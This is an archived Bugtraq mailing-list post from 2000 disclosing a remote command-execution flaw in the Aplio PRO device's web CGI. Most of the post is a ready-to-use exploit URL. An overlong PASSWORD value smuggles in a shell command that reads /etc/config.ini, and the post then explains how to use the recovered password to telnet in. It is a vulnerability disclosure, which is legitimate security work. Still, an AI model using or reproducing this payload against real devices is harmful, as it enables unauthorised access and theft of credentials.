[17102] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Fwd: APlio PRO web shell

daemon@ATHENA.MIT.EDU (Anthony Pardini)
Sun Oct 8 16:47:10 2000

Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-ID:  <00100616592307.01878@muerte.emphasys.net>
Date:         Fri, 6 Oct 2000 16:58:58 -0500
Reply-To: Anthony Pardini <tony@WATTERS.COM>
From: Anthony Pardini <tony@WATTERS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

This URL allows for the execution of commands via /bin/sh

http://ip/cgi-bin/authenticate.cgi?PASSWORD=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx010110101010101010101010110101010101010101010101010101010101010101010101010110101010101010298347019283740918273409182734091872340981723409871230498712309847109283740192834709128734091827340987123409XXcat%20%2Fetc%2Fconfig.ini

After this you can telnet in by using the passwd in the config file...
They must setup this feature as there doesn't seem to be a default password and
there must be a password to login.

> version
uClinux release 2.0.33, build #1 Wed May 31 11:55:22 CEST 2000
uClinux/Aplio release 1.1.16, build # Wed May 31 11:57:37 CEST 2000

http://www.aplio.com
-------------------------------------------------------


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[17102] in bugtraq

Fwd: APlio PRO web shell

daemon@ATHENA.MIT.EDU (Anthony Pardini)Sun Oct 8 16:47:10 2000

daemon@ATHENA.MIT.EDU (Anthony Pardini)
Sun Oct 8 16:47:10 2000